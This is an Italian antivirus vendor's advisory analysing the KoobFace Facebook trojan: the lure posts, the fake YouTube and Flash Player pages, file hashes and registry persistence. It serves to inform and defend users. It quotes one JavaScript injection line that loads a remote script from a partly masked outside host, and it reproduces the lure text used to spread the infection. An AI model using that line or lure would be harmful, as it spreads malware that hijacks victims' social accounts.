TG Soft Security Software Specialist - Vir.IT eXplorer: AntiVirus-AntiSpyware-AntiMalware-AntiRansomware
Identifica virus/malwareIdentifica virus polimorfici grazie a DEEP SCANMacro Virus AnalyzerTecnologia INTRUSION DETECTIONTools rimozione virus/malwareInstallazione su Active DirectoryProtezione Real-Time 16/32/64 bitVir.IT Scan MailVir.IT Console Client/ServerVir.IT WebFilter ProtectionAggiornamenti automatici Live-UpdateVir.IT Personal FirewallAssistenza tecnica in lingua italianaCentro Ricerche Anti Malware


Attiva la tua Licenza Invia file sospetto Newsletter

fb rss linkedin twitter

ECSM European Cyber Security Month Vir.IT eXplorer PRO dal 2016 Certificato ICSA Labs

Vir.IT eXplorer PRO dal 2016 Certificato VB100

AMTSO

OpsWat

AppEsteem



EICAR Membro SERIT - Security Research in ITaly

18/01/2012 09:57:09 - Trojan.Win32.KoobFace.AF


Trojan.Win32.KoobFace.AF


 
È un trend ormai consolidato quello di utilizzare strumenti ad alto potenziale comunicativo per la diffusione massiva di malware, puntando molto sulla "viralità" delle nuove mode di comunicazione e sulla larga diffusione che riescono a raggiungere in pochissimo tempo, sfruttando molto spesso la stessa curiosità degli utenti.
Social network come Facebook e Twitter, attraverso i quali è possibile raggiungere un enorme target di utenti, sono diventati l'obiettivo e lo strumento degli attacchi di malware di nuova generazione.


Tra le varie minacce circolanti su questi network, una sta spiccando come diffusione e numero di infezioni in questa seconda settimana di Gennaio. Dal 16 Gennaio, infatti, si è registrato un notevole aumento delle infezioni provocate da alcuni file riconducibili alla famiglia di malware identificata da TG Soft come Trojan.Win32.KoobFace.AF.

Tutto comincia su una banale pagina facebook, che invita il visitatore a cliccare sui collegamenti presenti per visualizzare i migliori video di YouTube. Il trucco per attirare il visitatore su questa pagina è il classico coinvolgimento personale sul proprio profilo, dove vengono lasciati commenti che riportano a quella pagina facendo riferimento a qualche non meglio specificato video e se ci si riconosca nel video.
"www,facebook,com/2xxxxxxxxxxxxx4 <--- ma sei te in sto video ??? (metti dei punti al posto delle virgole ♥)" è un tipico esempio di questi post, come si può vedere dalle immagini riportate di seguito.


(Fig. 1 - Click per ingrandire)



(Fig. 2 - Click per ingrandire)

(Fig. 3 - Click per ingrandire)

Raggiunta la pagina facebook suggerita, ci si trova di fronte ad una pagina semi-clone di YouTube (cfr. Fig. 2) che ci propone di cliccare per vedere il nostro video. Seguendo l'indicazione si viene riportati ad un sito che questa volta è un perfetto clone di YouTube (cfr. Fig. 3). Naturalmente il dominio è camuffato e non è assolutamente affiliato a quello ufficiale.
Appena si prova a guardare il video che dovrebbe riguardarci, dall'emblematico titolo "La persona più stupida al mondo ahahahaha", viene fatto notare che per riuscire a visualizzarlo correttamente è necessario scaricare un plug-in mancante, per la precisione l'Adobe Flash Player 11.0.
Il file che viene fatto scaricare chiaramente non ha nulla a che vedere con l'Adobe Flash Player, è solamente un malware che sfrutta la stessa icona e lo stesso nome del file (cfr Fig. 4) per ingannare l'utente che lo scarica fiducioso. Il file viene intercettato da Vir.IT eXplorer 6.8.89 e successivi con il nome di Trojan.Win32.Scar.RJ. L'infezione verrebbe quindi già bloccata a questo livello per chi è fornito di Vir.IT eXplorer PRO aggiornato e attivo sul computer.


(Fig. 4 - Click per ingrandire)
Dettagli tecnici sul file:
Nome File: AdobeFlashPalyer_11.0.2.exe
Md5: da10c1bc8493951d1ae96e67fc69fe21
Dimensione: 347277 byte
Versione: 3.3.6.1
Malware: Trojan.Win32.Scar.RJ

Se il file trova campo libero e riesce ad essere eseguito sul computer, scarica e installa altri malware. Il primo ad essere scaricato ed eseguito è un file chiamato upme.exe, che si pone in esecuzione automatica tramite la chiave di registro Run del profilo utente corrente con il nome upme. Il file viene intercettato e rimosso da Vir.IT eXplorer 7.0.71 e successivi con il nome di Trojan.Win32.KoobFace.AF.
 
Dettagli tecnici sul file:
Nome File: upme.exe
Md5: be47dad36bc1b06105085dc29a0e130e
Dimensione: 357745 byte
Versione: 3.3.6.1
Percorso: C:\log\upme.exe
Chiave di registro: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[upme] = C:\log\upme.exe
Compressione: Script Autoit
Malware: Trojan.Win32.KoobFace.AF

Una volta avviato e assicuratosi di essere eseguito ad ogni avvio di Windows modificando la chiave di registro indicata nella tabella soprastante, il Trojan.Win32.KoobFace.AF scarica altri malware della sua stessa famiglia, ma con file leggermente diversi in dimensione e tutti uguali tra loro.

Dettagli tecnici sul file:
Nome File: GamerOSD.exe, GoogleUpdate.exe, hamachi.exe, iexplore.exe, Openoffice.exe, Skype.exe, StikyNote.exe
Md5: 49d62b4b8662b2d6b14b6c78acfc9d91
Dimensione: 393619 byte
Versione: 3.3.6.1
Percorso: %temp%\{nome_applicazione}\{nome_file}.exe Oppure %AppData%\{nome_applicazione}\{nome_file}.exe
Chiave di registro: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[{nome_applicazione}] = {percorso_file}\{nome_file}.exe
Compressione: Script Autoit
Malware: Trojan.Win32.KoobFace.AF

Questi file, in realtà tutti uguali e copie dello stesso file, sono distribuiti tra la cartella Dati Applicazioni del profilo dell'utente corrente e la cartella dei file temporanei. Per camuffarsi e non risultare troppo sospetti assumono nomi di applicazioni realmente esistenti, anche se non sono installate nel sistema. Riportiamo alcuni nomi e percorsi che hanno assunto durante la nostra analisi a scopo di esempio:
Chiave di registro: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Valori:
  • [iexplorer] = C:\Documents and Settings\{nome_utente}\Dati applicazioni\Windows\iexplore.exe
  • [Openoffice] = C:\Documents and Settings\{nome_utente}\Dati applicazioni\Openoffice\Openoffice.exe
  • [Hamachi] = C:\Documents and Settings\{nome_utente}\Impostazioni Locali\Temp\Hamachi\ Hamachi.exe

Quando uno di questi malware è attivo sul sistema, resta in attesa che venga eseguito l'accesso a FaceBook dal computer infetto monitorando l'indirizzo visitato dal proprio browser. Quando viene eseguito l'accesso in FaceBook, il virus sostituisce l'indirizzo corrente con uno JavaScript nella barra degli indirizzi e lo manda in esecuzione. Il JavaScript della forma: javascript:(a=(b=document).createElement('script')).src='http://hapxxxxxxxxy.altervista.org/v/i/p/h/p/k_my.js',b.body.appendChild(a);void(0), non fa altro che appendere alla pagina corrente (cioè la pagina di FaceBook) un JavaScript preso da un sito infetto dal nome k_my.js.

Dettagli tecnici sul file:
Nome File: k_my.js
Md5: 25bc88de2b2008db2ed7801931863fac
Dimensione: 4157 byte
Compressione: N/A
Malware: Trojan.JS.FB.A

Analizzando il codice JavaScript del file k_my.js, si evince che la sua funzione è quella di recuperare l'intera lista di amici e la lista di pagine su cui si è cliccato "Mi Piace" e poi, iterando attraverso l'intera lista con due cicli distinti, postare sui profili dei propri amici e sulla bacheca delle pagine il testo iniziale da cui era partita tutta l'infezione: www,facebook,com/2xxxxxxxxxxxxx4 <--- ma sei te in sto video ??? (metti dei punti al posto delle virgole ♥).
In questo modo si garantisce una diffusione esponenziale e a macchia d'olio se le persone che ricevono il post sono abbastanza curiose da andare a vedere il link appena ricevuto e quindi diffondere a loro volta linfezione.

Il malware Trojan.Win32.KoobFace.AF nasconde questi post sulla pagina di chi li ha fatti se il computer infetto, quindi non ci si rende conto dell'accaduto finché qualcuno non ce lo segnali. Nel caso doveste incorrere incautamente in uno di questi link o notare strani comportamenti del vostro computer o i vostri amici vi segnalano post che non siete stati voi a fare, il consiglio è quello di effettuare una scansione completa del computer con un AntiVirus aggiornato, come ad esempio Vir.IT eXplorer Lite, scaricabile gratuitamente dalla nostra Homepage https://www.tgsoft.it e compatibile con il vostro attuale antivirus installato, oppure utilizzare la versione commerciale Vir.IT eXplorer PRO.
 
Download Vir.IT eXplorer Lite: l'AntiVirus gratuito e liberamente utilizzabile

Roberto Spagliccia

C.R.A.M. Centro Ricerche Anti Malware by TG Soft

Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook e/o in ogni altra forma sia in modalità  cartacea che elettronica a patto che venga sempre e comunque citata la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it"


Utilizzabilità delle informative e delle immagine in esse contenute

Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook a patto che venga sempre e comunque citata la fonte "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini. Inoltre per ogni immagine utilizzata dovrà essere sempre indicata la fonte ed il link cliccabile alla pagina originale dell'informativa di prima pubblicazione. Per quanto riguarda le pubblicazioni cartacee sarà necessario citare la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" ed in analogia alle pubblicata elettroniche i link sotto ad ogni immagine alla pagina web originale da cui sono state estratte.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito "Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]"

fb rss linkedin twitter
 




Legal & Eula | Privacy | Disinstallazione

TG Soft S.r.l. - via Pitagora 11/b, 35030 Rubàno (PD), ITALIA - C.F. e P.IVA 03296130283